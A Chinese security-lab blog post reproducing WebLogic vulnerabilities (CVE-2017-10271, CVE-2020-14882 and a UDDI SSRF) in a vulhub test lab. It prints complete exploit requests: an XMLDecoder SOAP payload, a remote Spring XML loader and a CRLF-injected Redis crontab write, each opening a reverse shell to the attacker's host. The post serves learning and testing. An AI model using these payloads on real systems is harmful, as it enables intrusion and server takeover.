weblogic常见漏洞复现

admin 2022年6月23日08:53:38安全文章评论11 views3913字阅读13分2秒阅读模式

weblogic常见漏洞复现

戟星安全实验室


    忆享科技旗下高端的网络安全攻防服务团队.安服内容包括渗透测试、代码审计、应急响应、漏洞研究、威胁情报、安全运维、攻防演练等

本文约3768字,阅读约需10分钟。



weblogic常见漏洞复现

0x00 简述



WebLogic 是美国 Oracle 公司出品的一个application server,确切的说是一个基于JAVAEE 架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web 应用、网络应用和数据库应用的Java 应用服务器。将 Java 的动态功能和 Java Enterprise 标准的安全性引入大型网络应用的开发、集成、部署和管理之中。


weblogic常见漏洞复现

0x01 CVE-2017-10271


Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。


复现环境:win7攻击机 centos7靶机

受影响WebLogic版本

10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0

这里利用vulhub项目地址:

https://github.com/vulhub/vulhub

docker拉起

weblogic常见漏洞复现


访问到这个界面代表拉起成功


判断访问/wls-wsat/CoordinatorPortType11,存在下图

则说明可能存在漏洞

weblogic常见漏洞复现


发送如下数据包(注意其中反弹shell的语句,需要进行编码,否则解析XML的时候将出现格式错误)。这里直接上反弹shell的POC丢bp:

POST /wls-wsat/CoordinatorPortType HTTP/1.1Host: your-ip:7001Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: text/xmlContent-Length: 633
<soapenv:Envelopexmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContextxmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.4.0"class="java.beans.XMLDecoder"><voidclass="java.lang.ProcessBuilder"><arrayclass="java.lang.String" length="3"><void index="0"><string>/bin/bash</string></void><void index="1"><string>-c</string></void><void index="2"><string>bash -i &gt;&amp;/dev/tcp/接收shell的ip/210&gt;&amp;1</string></void></array><voidmethod="start"/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>

攻击机开启监听


weblogic常见漏洞复现

 


weblogic常见漏洞复现

0x02 CVE-2020-14882


影响版本

WebLogic 10.3.6.0.0WebLogic 12.1.3.0.0WebLogic 12.2.1.3.0WebLogic 12.2.1.4.0WebLogic 14.1.1.0.0


授权访问poc:

http://your-ip:7001/console/css/%252e%252e%252fconsole.portal


首先通过上面是CVE-2020-14882的权限绕过漏洞,未授权访问后台管理页面

下面是反弹shell

先构造一个能外网访问的ip并构造test.xml

<?xml version="1.0"encoding="UTF-8" ?><beans xmlns="http://www.springframework.org/schema/beans"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://www.springframework.org/schema/beanshttp://www.springframework.org/schema/beans/spring-beans.xsd"><bean id="pb"class="java.lang.ProcessBuilder" init-method="start"><constructor-arg><list><value>bash</value><value>-c</value><value><![CDATA[bash -i >& /dev/tcp/192.168.174.130/77770>&1]]></value></list></constructor-arg></bean></beans>

这里是用python

python3 -m http.server 7002


在攻击机上开启监听

POC:

http://被攻击IP:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://vps的/test.xml")

 

weblogic常见漏洞复现

关于weak_password工具

https://github.com/TideSec/Decrypt_Weblogic_Password


weblogic常见漏洞复现

0x03 关于weblogicssrf


服务端请求伪造ssrf,是指Web服务提供从用户指定的URL读取数据并展示功能又未对用户输入的URL进行过滤,导致攻击者可借助服务端实现访问其本无权访问的URL。攻击者无权访问的URL主要是内网,而对于不是Web服务的其他端口反回的一般是端口对应的服务的banner信息,所以SSRF的一大利用是探测内网端口开放信息。(所以SSRF归类为信息泄漏类型)
产生的原因:服务器端的验证并没有对其请求获取图片的参数(image=)做出严格的过滤以及限制,导致A网站可以从其他服务器的获取数据
ssrf用途:内外网端口服务扫描、主机本地敏感信息读取、内外网主机应用程序漏洞的利用。内外网Web站点漏洞的利用


SSRF漏洞测试

weblogic的SSRF漏洞存在于

http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp

在burp中测试该漏洞,访问一个可以访问的ip:port,访问ip是内网IP地址,一般是拒绝访问的

访问未开放的段口和以开放的端口返回的东西是不一样的。如下图

当是未开放的端口时:


weblogic常见漏洞复现


可以看到返回的是could not connect over HTTP to server

是开放端口的话则返回:


weblogic常见漏洞复现


由此可以判断内网开放的端口服务。加以利用

注入HTTP头,利用redis反弹shell

这里用脚本来进行内网端口探测,我这里脚本没探测到内网开放的端口,但是用上面方法手工尝试可以获取到172.20.0.2:6379


weblogic常见漏洞复现


WeblogicSSRF有一个比较大的特点,其虽然是一个“GET”请求,但是我们可以通过传入%0a%0d来注入换行符,而某些服务(如redis)是通过换行符来分隔每条命令,也就说我们可以通过该SSRF攻击内网中的redis服务器。

POC:

/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.174.130%2F7777%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

在攻击机开启监听,然后丢入poc放包


weblogic常见漏洞复现


weblogic常见漏洞复现

 


weblogic常见漏洞复现

0x04 总结



weblogic的漏洞其实有很多,这里只是挑了一些比较常见的漏洞进行漏洞分析和复现,其实也有批量检测漏洞的软件,这里为了加深印象还是手动复现了一遍。



 声明

    由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,戟星安全实验室及文章作者不为此承担任何责任。

    戟星安全实验室拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经戟星安全实验室允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。


weblogic常见漏洞复现

戟星安全实验室

# 长按二维码 关注我们 #



原文始发于微信公众号(戟星安全实验室):weblogic常见漏洞复现

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月23日08:53:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  weblogic常见漏洞复现 https://cn-sec.com/archives/1136097.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: